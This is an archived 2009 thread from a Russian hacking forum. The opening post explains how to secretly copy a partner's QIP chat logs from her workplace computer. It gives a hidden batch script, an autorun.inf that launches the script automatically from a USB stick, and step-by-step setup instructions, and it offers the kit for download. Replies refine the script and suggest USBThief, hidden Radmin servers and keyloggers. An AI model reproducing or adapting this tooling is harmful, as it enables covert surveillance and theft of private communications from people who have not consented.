ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > ICQ
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как с помощью USB Flash украсть логи QIP ?
  #1  
Старый 06.05.2009, 17:05
Моргaн
Banned
Регистрация: 08.04.2009
Сообщений: 46
Провел на форуме:
340705

Репутация: 83
Отправить сообщение для Моргaн с помощью ICQ
По умолчанию Как с помощью USB Flash украсть логи QIP ?



Один мой знакомый перестал доверять своей второй половине и уж очень захотел узнать о чем она грустит просиживая целые дни в асе (в даном случае QIP).И вроде бы все предельно просто, но одно но, комп с которого она переписывалась у нее на работе .

Пораскинув извилинами понял что трояны и прочее... врядли пройдет номер. Решыл сделать это потихому с помощью USB Flash...
Что для этого нужно?

1 Создать файл zzz.bat с следующим текстом


@Echo off
c:
chdir C:\Program Files\QIP\Users
g:\rar.exe a -r users > nul
copy users.rar g:\123 > nul
del users.rar > nul



где
@Echo off.......скрывает визуальный процес копирования
C:\Program Files\QIP\Users.......папка которую нада потянуть
g:\rar.exe a -r users > nul.......запуск rar для ускорения копирования
copy users.rar g:\123 > nul.......адрес куда тянем
del users.rar > nul.......удаляет созданый архив

если буква флеш диска не извесна можна нарисовать несколько вариантов

@Echo off
c:
chdir C:\Program Files\QIP\Users
e:\rar.exe a -r users > nul
copy users.rar e:\123 > nul
g:\rar.exe a -r users > nul
copy users.rar g:\123 > nul
h:\rar.exe a -r users > nul
copy users.rar h:\123 > nul
del users.rar > nul


2 Создаем файл autorun.inf с текстом

[autorun]
ShellExeCute="zzz.bat"


3 Копируем rar.exe (1файлик а не всю папку) из папки Program Files\WinRAR


4 Создаем папку с названием 123


5 Поместить это все 4 файла в корень флешки и сделать скрытыми.


PS: Эфективно ворует мелкие файлы потому как это почти не заметно происходит.
А вот с большыми врятли получится , при архивировании слишком уж долго висит консоль.
Буду рад если кому пригодится


DOWNLOAD
http://depositfiles.com/files/7ux99kilp
 
Ответить с цитированием

  #2  
Старый 06.05.2009, 17:09
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию

забавно и просто ! +
Наглый копипаст
http://forum.antichat.ru/thread113095.html

Последний раз редактировалось DDoSька; 06.05.2009 в 17:11..
 
Ответить с цитированием

  #3  
Старый 06.05.2009, 17:58
Pernat1y
Постоянный
Регистрация: 20.12.2007
Сообщений: 577
Провел на форуме:
1636674

Репутация: 171


По умолчанию

copy %programfiles%\QIP\Users\* \files\*

ибо:
1. програм файлс могут быть на другом разделе, или вообще быть "Program Files x86"
2. диск Гэ может быть и не флэшкой. в итоге файлы скопируються хз куда. если вообще скопируються. так они скопируються туда, где лежит скрипт.

зы. лучше это делать нормальной прогой

Последний раз редактировалось Pernat1y; 06.05.2009 в 18:10..
 
Ответить с цитированием

  #4  
Старый 07.05.2009, 04:23
RumShun
Постоянный
Регистрация: 27.10.2008
Сообщений: 380
Провел на форуме:
1249808

Репутация: 149
Отправить сообщение для RumShun с помощью ICQ
По умолчанию

каждую неделю будем эту тему создавать?
 
Ответить с цитированием

  #5  
Старый 07.05.2009, 09:09
Rebit
Участник форума
Регистрация: 07.08.2007
Сообщений: 136
Провел на форуме:
2010588

Репутация: 653
Отправить сообщение для Rebit с помощью ICQ
По умолчанию

Старий способ и не факт што сработает ! Антивирь может спалить =))))
 
Ответить с цитированием

  #6  
Старый 08.05.2009, 13:35
radmir93
Banned
Регистрация: 04.04.2009
Сообщений: 66
Провел на форуме:
955391

Репутация: 225
Отправить сообщение для radmir93 с помощью ICQ
По умолчанию

Можно использовать USBThief ,правда он поможет только в том случае,если человек сохраняет свой пароль в qip
 
Ответить с цитированием

  #7  
Старый 08.05.2009, 14:39
Ne$$KvIK
Banned
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
236511

Репутация: 28
По умолчанию

не легче ли в QIP скопировать ручками или конфиг ини или в конфиге ини есть параметр custom вот все что там есть воруешь ну можно радмин сервер скрытый поставить и кейлогеров напихать))
 
Ответить с цитированием

  #8  
Старый 08.05.2009, 14:43
Roston
Постоянный
Регистрация: 31.07.2008
Сообщений: 370
Провел на форуме:
2866942

Репутация: 350
Отправить сообщение для Roston с помощью ICQ
По умолчанию

антивирь бантики не палит
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как стать хакером! foreva Болталка 19 12.12.2007 00:12
Установка Windoze глазами линуксоида (100% факты) nerezus Болталка 47 16.10.2005 15:06
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ